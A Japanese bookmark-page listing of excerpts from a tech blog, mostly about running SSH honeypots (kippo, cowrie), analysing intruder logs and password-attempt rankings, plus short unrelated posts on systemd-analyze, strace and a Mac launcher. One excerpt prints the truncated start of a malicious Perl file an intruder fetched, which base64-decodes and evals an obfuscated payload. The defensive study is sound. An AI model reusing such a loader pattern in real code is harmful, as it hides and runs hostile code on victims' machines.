サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
大阪万博
atani.github.io
数回に分けて、cowrieでsshの不正アクセスの実態を取得するようにしてきた。 ハニーポットcowrieのログを、mariaDBで管理しよう cowrieの不正侵入ログをelasticsearchにデータを入れる td-agent2-2-1ではfilterが使えるように 構成としてはこのような感じ。 今回は不正アクセスIPを利用し、地理情報を得て、どの国からのアクセスが多いのかをkibana4を使って出してみた。 GeoIPを設定する。geoipをインストールする。
前回、構築手順を書いたkippo。 ログをMySQL(mariaDB)で管理したいと思い、kippoで設定を試みるも、以下エラーが出て、途方にくれていた。 2015-07-21 00:41:42+0900 [-] Unable to format event {'log_namespace': 'twisted.logger._global', 'log_level': <LogLevel=warn>, 'fileNow': '/usr/lib64/python2.7/site-packages/twisted/python/log.py', 'format': '%(log_legacy)s', 'lineNow': 210, 'fileThen': '/usr/lib64/python2.7/site-packages/twisted/python/log.py', 'log_sour
不正アクセスを観測したのでご紹介。 動画を見ていただこう。 なにやら不正ファイルをwgetして実行しようとしてる。 Kippoは、侵入者がwgetしたファイルを、dl ディレクトリに全て格納してくれるので今回は実際に不審なファイルの中身を見てみよう。 中身を覗いてみる。encodeされていたので、見た目では、なにをするものなんかはわからない。 # more dl/20150709223030_http___erixx_altervista_org_new_txt #!/usr/bin/perl use MIME::Base64; eval (decode_base64('IyEvdXNyL2Jpbi9wZXJsDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy
サーバーにKippoを導入して以来、クラッカーから大量にSSHのログイン試行されているので、ログインに失敗したログからアカウントとパスワードを抜き出して、ランキングを作ってみた。 本ランキングを作るにあたり、 elasticsearch1.6 + kibana4 を利用した(こちらの導入方法は後日)。 また、kippoの導入方法は既に以下に記載済みなので参考にされたし。 CentOS7にKippoをインストールする 抽出条件kippo の以下のログインを試みたが失敗しているログから、アカウントとパスワードを取得。 ランキング化をしたものは大きく以下の2パターン。 最も試行の多いパスワードの文字数 6列目までのそれぞれ使用される頻度が多い文字数 取得期間: 2015/06/28 - 2015/07/04 では、ランキングスタート!! ランキングパスワードを使った文字数ランキングを出してみた。
# diff -ur build_config.rb_backup build_config.rb --- build_config.rb_backup 2015-07-03 13:32:27.017667686 +0900 +++ build_config.rb 2015-07-03 13:37:33.756710824 +0900 @@ -15,13 +15,14 @@ conf.gem :github => 'iij/mruby-pack' conf.gem :github => 'mattn/mruby-json' conf.gem :github => 'mattn/mruby-onig-regexp' - conf.gem :github => 'matsumoto-r/mruby-redis' - conf.gem :github => 'matsumoto-r/mruby-
SSHに辞書攻撃して、サーバに侵入しようと試みるクラッカーの動向を追うために、ssh用のハニーポットを導入してみた。 名前は「Kippo」。 インストール手順はsshハニーポットをkippoで作ってみる を参考にさせていただいた。 構成としては以下のとおり。 ┌──────────────┐ │ Cracker │ └──────┬───────┘ │ │ port:22 │ │ ▼ ┌───────────────────┐ │ firewalld │ │ ↓ │ │ portfoward-to: │ │ 22222 │ │ ↓ │ │ Kippo │ └───────────────────┘ 2015-06-29 20:25:36+0900 [SSHService ssh-userauth on HoneyPotTransport,442,43.255.189.44] login a
# systemd-analyze Startup finished in 666ms (kernel) + 2.171s (initrd) + 4.705s (userspace) = 7.542s kernel, initrd, userspace それぞれの合計時間をだしてくれる。 より詳細を知りたい場合は、blame オプションを使う。systemd-analyze blame の実行結果 # systemd-analyze blame 1.120s firewalld.service 1.032s network.service 987ms boot.mount 712ms tuned.service 574ms vboxadd.service 458ms vboxadd-x11.service 320ms systemd-vconsole-setup.service 293ms
Alfred2ってなに?macユーザーのための便利なランチャーです。 ランチャーってなに?マウスやトラックパッドで何度もぽちぽちクリックしてアプリを開いたりする面倒を省いてくれます。 インストールAlfred2 の無料版をダウンロードして、インストールしましょう。 インストール後の使い方。あなたがすべきことはたったの2ステップです。 option + space を叩いて、ランチャーを開く。 起動したいアプリ名を入れて(途中まででもOK) Enter すると即座にアプリが起動します! 他にもたくさん機能があります。 計算したり、 検索したり… シャットダウンや、スニペットも使えます。快適になること間違いなし。 参照: Macユーザー必須の神アプリ Alfred の基本的な使い方とか設定方法とか その1(検索&アクション)
cowrieを 7か月 運用して、大量に来た不正アクセス全20154件から色んなランキングを出してみた。 今後の運用の参考にして欲しい。 Read More 処理に時間がかかることがあり、どこが原因で遅くなっているのかを調べるときにstraceを利用して原因調査をしたことがあったので、使い方をまとめる。 基本的な使い方 これから処理を実行するとき usage: strace 実行処理 ex: strace perl hoge.pl 既に起動しているプロセスに対して実行するとき usage: strace -p [pid] ex: strace -p 111 Read More
このページを最初にブックマークしてみませんか?
『Simple blog @atani』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
